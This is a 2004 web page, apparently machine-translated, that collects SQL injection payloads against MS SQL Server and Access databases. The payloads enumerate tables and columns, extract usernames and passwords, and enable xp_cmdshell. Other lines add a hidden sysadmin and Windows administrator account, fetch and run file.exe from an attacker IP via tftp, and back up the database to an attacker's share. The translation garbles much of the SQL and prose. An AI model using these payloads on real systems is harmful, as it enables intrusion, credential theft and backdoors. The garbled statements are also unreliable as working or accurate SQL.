2. Tech
  3. SQL injection summary

SQL injection summary

xiaoxiao2021-03-06  119

SQL injection summary

Author:

SWAP

category:

Vulnerability database

Release date:

2004-06-28 12:31:03

Total browsing:

57

Sql injection summary (from the early 'or'1' = '1) The most important table name: select * from sysobjects sysobjects ncsysobjects sysindexes tsysindexes syscolumns systypes sysusers sysdatabases sysxlogins sysprocesses the most important ones the user name (default sql database exists in the ) PUBLIC DBO GUEST (general prohibition, or no permissions) DB_SercurityAdmin ab_dlladmin ----------------------------- Union Select Top 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'logintable'- UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME =' logintable 'WHERE COLUMN_NAME NOT IN (' login_id ') - UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'logintable' WHERE COLUMN_NAME NOT IN ( 'login_id', 'login_name') - UNION SELECT TOP 1 login_name FROM logintable- UNION SELECT TOP 1 password FROM logintable where login_name = 'Rahul' - construction statement: query whether there xp_cmdshell and 1 = (select @@ VERSION) and 'sa' = (SELECT System_user) and 1 = (SELECT count (*) FROM master.dbo.sysobjects WHERE xtype = 'X' aND name = 'xp_cmdshell'); EXEC master.dbo.sp_addextendedproc 'XP_cmdshell', 'X PLOG70.DLL '1 = (% 20Select% 20count (*)% 20FROM% 20master.dbo.sysobjects% 20where% 20 type =' x '% 20And% 20Name =' xp_cmdshell ') and 1 = (select is_srvrolemember (' sysadmin ') Decision SA authority is AND 1 = (Select Name from master.dbo.sdatabases WHERE DBID = 7) Get the library name (from 1 to 5 is the iD, 6 or more can be judged) and 0 <> (Select Count) *) From master.dbo.sysdatabases where name> 1 and dbid = 6) Submit DBID = 7, 8, 9 .... Get more database name and 0 <> (Select Top 1 Name from bbs.dbo. sysobjects where xtype = 'u'

Virgin is assumed to get other tables for admin and 0 <> (select top 1 name from bbs.dbo.sysobjects where xtype = 'u' and name not in ('admin')). AND 0 <> (Select Count (*) from bbs.dbo.sysObjects where xtype = 'u' and name = 'admin' and uid> (STR (ID))) Value Value assumes to 18779569 UID = ID AND 0 <> (Select Top 1 Name from bbs.dbo.syscolumns where id = 18779569) Get a field of admin, assuming user_id and 0 <> (select top 1 name from bbs.dbo.syscolumns where id = 18779569 and name NOT IN ('ID', ...)) to fade other fields and 0 <(Select user_id from bbs.dbo.admin where username> 1) You can get a password in order. . . . .

Assume that there is user_id username, password and other fields and 0 <> (Select Count (*) from master.dbo.sdatabases where name> 1 and dbid = 6) and 0 <> (select top 1 name from bbs.dbo.sysobjects where xtype = 'U') Get a table name and 0 <> (Select Top 1 Name from bbs.dbo.sysobjects where xtype = 'u' and name not in ('address')) and 0 <> (Select Count (*) from BBS.DBO.SYSOBJECTS WHERE XTYPE = 'u' and name = 'admin' and uid> (STR (ID))) Determined ID value and 0 <> (SELECT TOP 1 Name from bbs.dbo.syscolumns where id = 773577794) All fields of traditional XP_cmdshell test procedures:; exec master.dbo.sp_addlogin Hax; -; exec master.dbo.sp_password null, hax, hax; -; exec master.dbo.sp_addsrvrolemember hax sysadmin; -; exec master.dbo.xp_cmdshell 'net user hax hax / workstations: * / times: all / passwordchg: yes / passwordreq: yes / active: yes / add'; -; exec master.dbo.xp_cmdshell 'net localgroup administrators hax / add '; - EXEC MASTER HT', 'Schedule' Exec Master ", 'Server' http://localhost/show.dbo.xp_cmdshell 'TFTP -I yo UIP get file.exe '; - http://localhost/show.asp? id = 1'; exec master..xp_cmdshell 'tftp -i youip get file.exe'-declare @a sysname set @ a =' xp_ ' ' cmdshell 'exec @a' Dir C: / 'Declare @a sysname set @ a =' xp ' ' _ cm ' ' dshell 'exec @a' DIR C: / '; DECLARE @A; set @a = DB_NAME (); Backup Database @a to disk = 'Your IP Your shared directory BAK.DAT' If it is limited, you can.

Select * from OpenRowSet ('SQLOLEDB', 'Server'; 'Sa'; '', 'SELECT' '' '' EXEC MASTER.DBO.SP_ADDLOGIN HAX ') Traditional Query Construction: SELECT * from news where id = .. And Topic = ... and ..... Admin 'And (*) from [user] where username =' Victim 'And Right (Left (UserPass, 01), 1) =' 1 ' ) and userpass <> 'SELECT 123; -; use master; -: a' or name like 'fff%'; - Show with a user named FFFF. 'and 1 <> (user]); -; Update [users] set email = (Select Top 1 Name from sysobjects where xtype =' u 'and status> 0) Where name =' FFFF '; - Description: The above statement is to get the first user table in the database and put the table name in the mailbox field of the FFFF user.

By viewing FFFF users, you can get the first table called AD and get the ID fff 'of this table according to the table name Ad, Update [users] set email = (select top 1 id from sysobjects where xtype =' u 'and name = 'ad') Where name = 'fff'; - I can get the name of the second table in the next table, fff '; update [users] set email = (select top 1 name from sysobjects where xtype =' u " And id> 581577110) Where name = 'fff'; - fff '; Update [users] set email = (select top 1 count (id) from password where name =' fff '; - fff'; Update [user ] set email = (Select Top 1 PWD from password where id = 2) where name = 'fff'; - fff '; Update [users] set email = (select top 1 name from password where id = 2) Where name = 'ffff'; - exec master..xp_servicecontrol 'start', 'schedule' exec master..xp_servicecontrol 'start', 'server' sp_addextendedproc 'xp_webserver', 'c: /temp/xp_foo.dll' can be extended by storing General method call: EXEC XP_WEBSERVER Once this extension store is executed, it can be removed: sp_dropextendedProc 'xp_webserver' INSERT INTO Users Values ​​(666, char (0x63) char (0x68) char (0x72) char (0x69) Char (0x73), char (0x63) char (0x68) char (0x72) char (0x69) char (0x73), 0xfff) - INSERT INTO USERS V Alues (667, 123, 123, 0xfff) - Insert INTO Users Values ​​(123, 'Admin' '-', 'Password', 0xfff) -; And user> 0 ;; and (select count (*) from sysobjects> 0 ;; And (Select Count (*) from MySysObjects> 0 // for Access Database -------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------- Some of usually injected: a) ID = 49 The parameters of this type of injected is digital, the SQL statement is rough As follows: select * from the name of the WHERE field = 49 Injection parameters is ID = 49 and [Query Condition], that is, the generated statement: SELECT * FROM table name where field =

49 and [Query Conditions] (B) Class = Continuous The Injection Parameters are character patterns, and the SQL statement is generally approveled: select * from the name of the WHERE field = "series" Injection parameters is Class = Serpent 'and [query Conditions] and '' = ', that is, the generating statement: SELECT * FROM table name Where field =' series of series 'and' = '' (c) No filtering parameters, such as Keyword = Keywords The SQL statement is from the following: SELECT * FROM Table Name WHERE FROT LIKE '% Keyword%' Injection Parameters to Keyword = 'AND [Query Condition] and'% 25 '=', that is, the generated statement: SELECT * FROM table Name WHERE Field Like '%' = ';; And (Select Top 1 Name from sysobjects where xtype =' u 'and status> 0)> 0 sysobjects is a system table for SQLServer, Store all of the table names, views, constraints, and other objects, Xtype = 'u' and status> 0, indicating the table name established by the user, the above statement will be removed, and the 0 is relatively small, let the error message Exposes the table name. ; And (select top 1 col_name (Object_ID ('Name')> 0 After getting the table name from 5, use Object_ID ('Name') to get the internal ID, col_name ("COL_NAME) Table name ID, 1) Represents the first field name of the table, replace it with 2, 3, 4 ... You can get the field name inside the specified sheet one by one. POST.HTM content: It is mainly convenient to enter.